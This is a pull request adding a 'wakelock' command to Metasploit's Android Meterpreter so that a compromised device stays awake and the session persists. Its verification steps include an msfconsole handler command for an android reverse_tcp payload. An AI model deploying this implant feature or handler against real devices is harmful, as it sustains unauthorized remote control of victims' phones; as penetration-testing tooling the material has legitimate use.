### PR TITLE
add android_wakelock functionality

### DIFF
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -328,6 +328,12 @@ class Android < Extension
     end
   end
 
+  def wakelock(flags)
+    request = Packet.create_request('android_wakelock')
+    request.add_tlv(TLV_TYPE_FLAGS, flags)
+    response = client.send_request(request)
+  end
+
 end
 end
 end

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -33,7 +33,8 @@ class Console::CommandDispatcher::Android
       'activity_start'    => 'Start an Android activity from a Uri string',
       'hide_app_icon'     => 'Hide the app icon from the launcher',
       'sqlite_query'      => 'Query a SQLite database from storage',
-      'set_audio_mode'    => 'Set Ringer Mode'
+      'set_audio_mode'    => 'Set Ringer Mode',
+      'wakelock'          => 'Enable/Disable Wakelock',
     }
 
     reqs = {
@@ -49,7 +50,8 @@ class Console::CommandDispatcher::Android
       'activity_start'   => ['android_activity_start'],
       'hide_app_icon'    => ['android_hide_app_icon'],
       'sqlite_query'     => ['android_sqlite_query'],
-      'set_audio_mode'   => ['android_set_audio_mode']
+      'set_audio_mode'   => ['android_set_audio_mode'],
+      'wakelock'         => ['android_wakelock'],
     }
 
     # Ensure any requirements of the command are met
@@ -649,6 +651,35 @@ class Console::CommandDispatcher::Android
       end
       print_line
       print_line(table.to_s)
+    end
+  end
+
+  def cmd_wakelock(*args)
+    wakelock_opts = Rex::Parser::Arguments.new(
+      '-h' => [ false, 'Help Banner' ],
+      '-r' => [ false, 'Release wakelock' ],
+      '-f' => [ true, 'Advanced Wakelock flags (e.g 268435456)' ],
+    )
+
+    flags = 1 # PARTIAL_WAKE_LOCK
+    wakelock_opts.parse(args) do |opt, _idx, val|
+      case opt
+      when '-h'
+        print_line('Usage: wakelock [options]')
+        print_line(wakelock_opts.usage)
+        return
+      when '-r'
+        flags = 0
+      when '-f'
+        flags = val.to_i
+      end
+    end
+
+    client.android.wakelock(flags)
+    if flags == 0
+      print_status("Wakelock was released")
+    else
+      print_status("Wakelock was acquired")
     end
   end
 


### PR DESCRIPTION
This pr adds a wakelock command to Android meterpreter.
This allows a user to keep the screen/cpu on when the device is idle.
This unfortunately waste the battery, but is useful if you want to keep the session open for a long period.

## Verification
- [x] Land and use: https://github.com/rapid7/metasploit-payloads/pull/162
- [x] Get an android meterpreter session: `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j`
- [x] Unplug the device and wait for the devices screen to switch off
- [x] Run the command `wakelock -f 268435456` and ensure the screen wakes up
- [x] Run the command `wakelock -r` and ensure the screen switches off again
- [x] Run the command `wakelock` then leave the device idle, ensure you can still interact with the session until the battery runs out?
